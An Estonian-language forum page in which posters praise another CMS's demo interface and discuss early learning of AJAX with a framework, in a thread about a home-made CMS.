vaadake seda demo videot: http://www.cmsbox.com/?_k=UCheioAG. Minu meelest üks parima UI-ga CMS, mida näinud olen.

sinnamaani on ikka kohutavalt pikk tee! icon_biggrin.gif Hetkel teen AJAX-iga tutvust alles, alustanud olen vaid funktsioonide jms. asjade taustal toimetama panemise ja andmete sisestamise/kuvamisega. Ja sedagi vastava framework-i abil, mitte ise ei kriba AJAX-koodi nullist. Veel mitte.
Kommentaarid: 4 loe/lisa Kasutajad arvavad:  :: 1 :: 1 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
näita postitusi alates eelmisest:   
uus teema   vasta Tarkvara »  WWW »  SGM CMS (arvamus ja veaotsingud) mine lehele 1, 2, 3  järgmine
[vaata eelmist teemat] [vaata järgmist teemat]
 lisa lemmikuks
näita foorumit:  
 ignoreeri teemat 
sa ei või postitada uusi teemasid siia foorumisse
sa ei või vastata selle foorumi teemadele
sa ei või muuta oma postitusi selles foorumis
sa ei või kustutada oma postitusi selles foorumis
sa ei või vastata küsitlustele selles foorumis
sa ei saa lisada manuseid selles foorumis
sa võid manuseid alla laadida selles foorumis



Hinnavaatlus ei vastuta foorumis tehtud postituste eest.